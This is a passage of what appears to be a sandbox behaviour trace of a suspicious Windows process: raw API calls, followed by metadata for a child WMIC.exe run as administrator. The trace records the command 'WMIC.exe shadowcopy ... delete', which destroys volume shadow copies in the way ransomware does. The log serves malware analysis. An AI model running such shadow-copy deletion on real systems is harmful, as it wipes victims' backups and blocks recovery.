_wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0096.924] GetProcessHeap () returned 0xe0000 [0096.924] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf46f0 | out: hHeap=0xe0000) returned 1 [0096.924] GetProcessHeap () returned 0xe0000 [0096.924] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x12) returned 0xf8a30 [0096.924] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0096.925] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2eedf0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2eeda0 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete", lpProcessInformation=0x2eeda0*(hProcess=0x54, hThread=0x50, dwProcessId=0x8cc, dwThreadId=0xb38)) returned 1 [0096.928] CloseHandle (hObject=0x50) returned 1 [0096.928] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0096.928] GetProcessHeap () returned 0xe0000 [0096.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfc360 | out: hHeap=0xe0000) returned 1 [0096.928] GetEnvironmentStringsW () returned 0xfad60* [0096.928] GetProcessHeap () returned 0xe0000 [0096.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xae8) returned 0xfb850 [0096.929] FreeEnvironmentStringsW (penv=0xfad60) returned 1 [0096.929] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0098.396] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2eece8 | out: lpExitCode=0x2eece8*=0x0) returned 1 [0098.396] CloseHandle (hObject=0x54) returned 1 [0098.396] _vsnwprintf (in: _Buffer=0x2eef58, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eecf8 | out: _Buffer="00000000") returned 8 [0098.396] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0098.396] GetProcessHeap () returned 0xe0000 [0098.396] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfb850 | out: hHeap=0xe0000) returned 1 [0098.396] GetEnvironmentStringsW () returned 0xfad60* [0098.396] GetProcessHeap () returned 0xe0000 [0098.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xb0e) returned 0xfb880 [0098.396] FreeEnvironmentStringsW (penv=0xfad60) returned 1 [0098.396] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0098.396] GetProcessHeap () returned 0xe0000 [0098.396] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfb880 | out: hHeap=0xe0000) returned 1 [0098.396] GetEnvironmentStringsW () returned 0xfad60* [0098.396] GetProcessHeap () returned 0xe0000 [0098.396] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xb0e) returned 0xfb880 [0098.396] FreeEnvironmentStringsW (penv=0xfad60) returned 1 [0098.396] GetProcessHeap () returned 0xe0000 [0098.396] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf8a30 | out: hHeap=0xe0000) returned 1 [0098.396] DeleteProcThreadAttributeList (in: lpAttributeList=0x2eedb8 | out: lpAttributeList=0x2eedb8) [0098.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.397] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0098.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.397] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fbe194 | out: lpMode=0x49fbe194) returned 1 [0098.397] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.397] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fbe198 | out: lpMode=0x49fbe198) returned 1 [0098.397] SetConsoleInputExeNameW () returned 0x1 [0098.397] GetConsoleOutputCP () returned 0x1b5 [0098.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fcbfe0 | out: lpCPInfo=0x49fcbfe0) returned 1 [0098.397] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0098.398] exit (_Code=0) Process: id = "21" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x7a17d000" os_pid = "0x8cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x67c" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 151 os_tid = 0xb38 [0096.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10f930 | out: lpSystemTimeAsFileTime=0x10f930*(dwLowDateTime=0x41620710, dwHighDateTime=0x1d68245)) [0096.961] GetCurrentProcessId () returned 0x8cc [0096.961] GetCurrentThreadId () returned 0xb38 [0096.961] GetTickCount () returned 0x114df77 [0096.962] QueryPerformanceCounter (in: lpPerformanceCount=0x10f938 | out: lpPerformanceCount=0x10f938*=21685466441) returned 1 [0096.964] GetModuleHandleW (lpModuleName=0x0) returned 0xff600000 [0096.964] __set_app_type (_Type=0x1) [0096.964] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff64ced0) returned 0x0 [0096.964] __wgetmainargs (in: _Argc=0xff672380, _Argv=0xff672390, _Env=0xff672388, _DoWildCard=0, _StartInfo=0xff67239c | out: _Argc=0xff672380, _Argv=0xff672390, _Env=0xff672388) returned 0 [0096.965] ??0CHString@@QEAA@XZ () returned 0xff672ab0 [0096.965] malloc (_Size=0x30) returned 0x1d5a50 [0096.965] malloc (_Size=0x70) returned 0x1d5a90 [0096.965] malloc (_Size=0x50) returned 0x1d7d30 [0096.965] malloc (_Size=0x30) returned 0x1d7d90 [0096.965] malloc (_Size=0x48) returned 0x1d7dd0 [0096.965] malloc (_Size=0x30) returned 0x1d7e20 [0096.965] malloc (_Size=0x30) returned 0x1d7e60 [0096.965] ??0CHString@@QEAA@XZ () returned 0xff672f58 [0096.965] malloc (_Size=0x30) returned 0x1d7ea0 [0096.965] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0096.965] SetConsoleCtrlHandler (HandlerRoutine=0xff645724, Add=1) returned 1 [0096.965] _onexit (_Func=0xff65f378) returned 0xff65f378 [0096.965] _onexit (_Func=0xff65f490) returned 0xff65f490 [0096.965] _onexit (_Func=0xff65f4d0) returned 0xff65f4d0 [0096.965] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0096.966] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0096.969] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0096.978] CoCreateInstance (in: rclsid=0xff6073a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff607370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff672940 | out: ppv=0xff672940*=0x1f51390) returned 0x0 [0096.984] GetCurrentProcess () returned 0xffffffffffffffff [0096.984] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x10f700 | out: TokenHandle=0x10f700*=0xf4) returned 1 [0096.984] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10f6f8 | out: TokenInformation=0x0, ReturnLength=0x10f6f8) returned 0 [0096.984] malloc (_Size=0x118) returned 0x1d69a0 [0096.984] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x1d69a0, TokenInformationLength=0x118, ReturnLength=0x10f6f8 | out: TokenInformation=0x1d69a0, ReturnLength=0x10f6f8) returned 1 [0096.984] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x1d69a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1748370389, Attributes=0x1065), (Luid.LowPart=0x0, Luid.HighPart=1933024, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0096.985] free (_Block=0x1d69a0) [0096.985] CloseHandle (hObject=0xf4) returned 1 [0096.985] malloc (_Size=0x40) returned 0x1d7ee0 [0096.985] malloc (_Size=0x40) returned 0x1d7f30 [0096.985] malloc (_Size=0x40) returned 0x1d7f80 [0096.985] malloc (_Size=0x20a) returned 0x1d69a0 [0096.985] GetSystemDirectoryW (in: lpBuffer=0x1d69a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0096.985] free (_Block=0x1d69a0) [0096.985] malloc (_Size=0x18) returned 0x3bdfb0 [0096.985] malloc (_Size=0x18) returned 0x1d69a0 [0096.985] malloc (_Size=0x18) returned 0x1d69c0 [0096.985] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0096.985] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0096.985] free (_Block=0x3bdfb0) [0096.985] free (_Block=0x1d69a0) [0096.985] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0096.985] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0096.986] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0096.986] FreeLibrary (hLibModule=0x77940000) returned 1 [0096.986] free (_Block=0x1d69c0) [0096.986] _vsnwprintf (in: _Buffer=0x1d7f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x10f328 | out: _Buffer="ms_409") returned 6 [0096.986] malloc (_Size=0x20) returned 0x1d69a0 [0096.986] GetComputerNameW (in: lpBuffer=0x1d69a0, nSize=0x10f700 | out: lpBuffer="XDUWTFONO", nSize=0x10f700) returned 1 [0096.986] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.986] malloc (_Size=0x14) returned 0x3bdfb0 [0096.986] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.986] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x10f6f8 | out: lpNameBuffer=0x0, nSize=0x10f6f8) returned 0x7fffffde000 [0096.987] GetLastError () returned 0xea [0096.987] malloc (_Size=0x40) returned 0x1d69d0 [0096.987] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1d69d0, nSize=0x10f6f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10f6f8) returned 0x1 [0096.987] lstrlenW (lpString="") returned 0 [0096.987] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.987] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0096.988] lstrlenW (lpString=".") returned 1 [0096.988] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.988] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0096.988] lstrlenW (lpString="LOCALHOST") returned 9 [0096.988] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.988] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0096.988] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.988] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0096.989] free (_Block=0x3bdfb0) [0096.989] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.989] malloc (_Size=0x14) returned 0x3bdfb0 [0096.989] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.989] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.989] malloc (_Size=0x14) returned 0x1d6a20 [0096.989] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.989] malloc (_Size=0x8) returned 0x1d6a40 [0096.989] malloc (_Size=0x18) returned 0x1d6a60 [0096.989] malloc (_Size=0x30) returned 0x1d6a80 [0096.989] malloc (_Size=0x18) returned 0x1d6ac0 [0096.989] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.989] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.989] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.989] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.989] malloc (_Size=0x30) returned 0x1d6ae0 [0096.989] malloc (_Size=0x18) returned 0x1d6b20 [0096.989] SysStringLen (param_1="IMPERSONATE") returned 0xb [0096.989] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.989] SysStringLen (param_1="IMPERSONATE") returned 0xb [0096.989] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.989] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.989] SysStringLen (param_1="IMPERSONATE") returned 0xb [0096.989] malloc (_Size=0x30) returned 0x1d6b40 [0096.989] malloc (_Size=0x18) returned 0x1d6b80 [0096.989] SysStringLen (param_1="DELEGATE") returned 0x8 [0096.989] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.990] SysStringLen (param_1="DELEGATE") returned 0x8 [0096.990] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.990] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.990] SysStringLen (param_1="DELEGATE") returned 0x8 [0096.990] malloc (_Size=0x30) returned 0x1d6ba0 [0096.990] malloc (_Size=0x18) returned 0x1d6be0 [0096.990] malloc (_Size=0x30) returned 0x1d6c00 [0096.990] malloc (_Size=0x18) returned 0x1d6c40 [0096.990] SysStringLen (param_1="NONE") returned 0x4 [0096.990] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.990] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.990] SysStringLen (param_1="NONE") returned 0x4 [0096.990] malloc (_Size=0x30) returned 0x1d6c60 [0096.990] malloc (_Size=0x18) returned 0x1d6ca0 [0096.990] SysStringLen (param_1="CONNECT") returned 0x7 [0096.990] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.990] malloc (_Size=0x30) returned 0x1d6cc0 [0096.990] malloc (_Size=0x18) returned 0x1d6d00 [0096.990] SysStringLen (param_1="CALL") returned 0x4 [0096.990] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.990] SysStringLen (param_1="CALL") returned 0x4 [0096.990] SysStringLen (param_1="CONNECT") returned 0x7 [0096.990] malloc (_Size=0x30) returned 0x1d6d20 [0096.990] malloc (_Size=0x18) returned 0x1d6d60 [0096.990] SysStringLen (param_1="PKT") returned 0x3 [0096.990] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.990] SysStringLen (param_1="PKT") returned 0x3 [0096.990] SysStringLen (param_1="NONE") returned 0x4 [0096.990] SysStringLen (param_1="NONE") returned 0x4 [0096.990] SysStringLen (param_1="PKT") returned 0x3 [0096.990] malloc (_Size=0x30) returned 0x1d6d80 [0096.990] malloc (_Size=0x18) returned 0x1d6dc0 [0096.990] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.991] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.991] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.991] SysStringLen (param_1="NONE") returned 0x4 [0096.991] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.991] SysStringLen (param_1="PKT") returned 0x3 [0096.991] SysStringLen (param_1="PKT") returned 0x3 [0096.991] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.991] malloc (_Size=0x30) returned 0x1d8000 [0096.991] malloc (_Size=0x18) returned 0x1d6de0 [0096.991] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.991] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.991] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.991] SysStringLen (param_1="PKT") returned 0x3 [0096.991] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.991] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.991] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.991] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.991] malloc (_Size=0x30) returned 0x1d8040 [0096.992] malloc (_Size=0x40) returned 0x1d6e00 [0096.992] malloc (_Size=0x20a) returned 0x1d6e50 [0096.992] GetSystemDirectoryW (in: lpBuffer=0x1d6e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0096.992] free (_Block=0x1d6e50) [0096.992] malloc (_Size=0x18) returned 0x1d6e50 [0096.992] malloc (_Size=0x18) returned 0x1d6e70 [0096.992] malloc (_Size=0x18) returned 0x1d6e90 [0096.992] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0096.992] SysStringLen (param_1="\\wbem\\") returned 0x6 [0096.992] free (_Block=0x1d6e50) [0096.992] free (_Block=0x1d6e70) [0096.992] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0096.992] free (_Block=0x1d6e90) [0096.992] malloc (_Size=0x18) returned 0x1d6e50 [0096.992] malloc (_Size=0x18) returned 0x1d6e70 [0096.992] malloc (_Size=0x18) returned 0x1d6e90 [0096.992] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0096.992] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0096.992] free (_Block=0x1d6e50) [0096.992] free (_Block=0x1d6e70) [0096.992] GetCurrentThreadId () returned 0xb38 [0096.993] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x10f000 | out: phkResult=0x10f000*=0xf8) returned 0x0 [0096.993] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x10f050, lpcbData=0x10eff0*=0x400 | out: lpType=0x0, lpData=0x10f050*=0x30, lpcbData=0x10eff0*=0x4) returned 0x0 [0096.993] _wcsicmp (_String1="0", _String2="1") returned -1 [0096.993] _wcsicmp (_String1="0", _String2="2") returned -2 [0096.993] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x10eff0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x10eff0*=0x42) returned 0x0 [0096.993] malloc (_Size=0x86) returned 0x1d6eb0 [0096.993] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x1d6eb0, lpcbData=0x10eff0*=0x42 | out: lpType=0x0, lpData=0x1d6eb0*=0x25, lpcbData=0x10eff0*=0x42) returned 0x0 [0096.993] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0096.993] malloc (_Size=0x42) returned 0x1d6f40 [0096.993] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0096.993] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x10f050, lpcbData=0x10eff0*=0x400 | out: lpType=0x0, lpData=0x10f050*=0x36, lpcbData=0x10eff0*=0xc) returned 0x0 [0096.993] _wtol (_String="65536") returned 65536 [0096.993] free (_Block=0x1d6eb0) [0096.993] RegCloseKey (hKey=0x0) returned 0x6 [0096.993] CoCreateInstance (in: rclsid=0xff607410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff6073f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x10f4f8 | out: ppv=0x10f4f8*=0x24271d0) returned 0x0 [0097.008] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x24271d0, xmlSource=0x10f640*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x1d6e50), isSuccessful=0x10f6b0 | out: isSuccessful=0x10f6b0*=0xffff) returned 0x0 [0097.102] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x24271d0, DOMElement=0x10f4f0 | out: DOMElement=0x10f4f0) returned 0x0 [0097.102] malloc (_Size=0x18) returned 0x1d6e50 [0097.102] free (_Block=0x1d6e50) [0097.102] malloc (_Size=0x18) returned 0x1d6e50 [0097.103] free (_Block=0x1d6e50) [0097.103] malloc (_Size=0x18) returned 0x1d6e50 [0097.103] malloc (_Size=0x18) returned 0x1d6e70 [0097.103] malloc (_Size=0x30) returned 0x1d8080 [0097.103] malloc (_Size=0x18) returned 0x1d6eb0 [0097.103] free (_Block=0x1d6eb0) [0097.103] malloc (_Size=0x18) returned 0x1dc560 [0097.103] malloc (_Size=0x18) returned 0x1dc580 [0097.103] SysStringLen (param_1="VALUE") returned 0x5 [0097.103] SysStringLen (param_1="TABLE") returned 0x5 [0097.103] SysStringLen (param_1="TABLE") returned 0x5 [0097.103] SysStringLen (param_1="VALUE") returned 0x5 [0097.104] malloc (_Size=0x30) returned 0x1d80c0 [0097.104] malloc (_Size=0x18) returned 0x1dc5a0 [0097.104] free (_Block=0x1dc5a0) [0097.104] malloc (_Size=0x18) returned 0x1dc5a0 [0097.104] malloc (_Size=0x18) returned 0x1dc5c0 [0097.104] SysStringLen (param_1="LIST") returned 0x4 [0097.104] SysStringLen (param_1="TABLE") returned 0x5 [0097.104] malloc (_Size=0x30) returned 0x1d8100 [0097.104] malloc (_Size=0x18) returned 0x1dc5e0 [0097.104] free (_Block=0x1dc5e0) [0097.104] malloc (_Size=0x18) returned 0x1dc5e0 [0097.104] malloc (_Size=0x18) returned 0x1dc600 [0097.105] SysStringLen (param_1="RAWXML") returned 0x6 [0097.105] SysStringLen (param_1="TABLE") returned 0x5 [0097.105] SysStringLen (param_1="RAWXML") returned 0x6 [0097.105] SysStringLen (param_1="LIST") returned 0x4 [0097.105] SysStringLen (param_1="LIST") returned 0x4 [0097.105] SysStringLen (param_1="RAWXML") returned 0x6 [0097.105] malloc (_Size=0x30) returned 0x1d8140 [0097.105] malloc (_Size=0x18) returned 0x1dc620 [0097.105] free (_Block=0x1dc620) [0097.105] malloc (_Size=0x18) returned 0x1dc620 [0097.105] malloc (_Size=0x18) returned 0x1dc640 [0097.105] SysStringLen (param_1="HTABLE") returned 0x6 [0097.105] SysStringLen (param_1="TABLE") returned 0x5 [0097.105] SysStringLen (param_1="HTABLE") returned 0x6 [0097.105] SysStringLen (param_1="LIST") returned 0x4 [0097.105] malloc (_Size=0x30) returned 0x1d8180 [0097.106] malloc (_Size=0x18) returned 0x1dc660 [0097.106] free (_Block=0x1dc660) [0097.106] malloc (_Size=0x18) returned 0x1dc660 [0097.106] malloc (_Size=0x18) returned 0x1dc680 [0097.106] SysStringLen (param_1="HFORM") returned 0x5 [0097.106] SysStringLen (param_1="TABLE") returned 0x5 [0097.106] SysStringLen (param_1="HFORM") returned 0x5 [0097.106] SysStringLen (param_1="LIST") returned 0x4 [0097.106] SysStringLen (param_1="HFORM") returned 0x5 [0097.106] SysStringLen (param_1="HTABLE") returned 0x6 [0097.106] malloc (_Size=0x30) returned 0x1d81c0 [0097.106] malloc (_Size=0x18) returned 0x1dc6a0 [0097.106] free (_Block=0x1dc6a0) [0097.107] malloc (_Size=0x18) returned 0x1dc6a0 [0097.107] malloc (_Size=0x18) returned 0x1dc6c0 [0097.107] SysStringLen (param_1="XML") returned 0x3 [0097.107] SysStringLen (param_1="TABLE") returned 0x5 [0097.107] SysStringLen (param_1="XML") returned 0x3 [0097.107] SysStringLen (param_1="VALUE") returned 0x5 [0097.107] SysStringLen (param_1="VALUE") returned 0x5 [0097.107] SysStringLen (param_1="XML") returned 0x3 [0097.107] malloc (_Size=0x30) returned 0x1d8200 [0097.107] malloc (_Size=0x18) returned 0x1dc6e0 [0097.107] free (_Block=0x1dc6e0) [0097.107] malloc (_Size=0x18) returned 0x1dc6e0 [0097.108] malloc (_Size=0x18) returned 0x1dc700 [0097.108] SysStringLen (param_1="MOF") returned 0x3 [0097.108] SysStringLen (param_1="TABLE") returned 0x5 [0097.108] SysStringLen (param_1="MOF") returned 0x3 [0097.108] SysStringLen (param_1="LIST") returned 0x4 [0097.108] 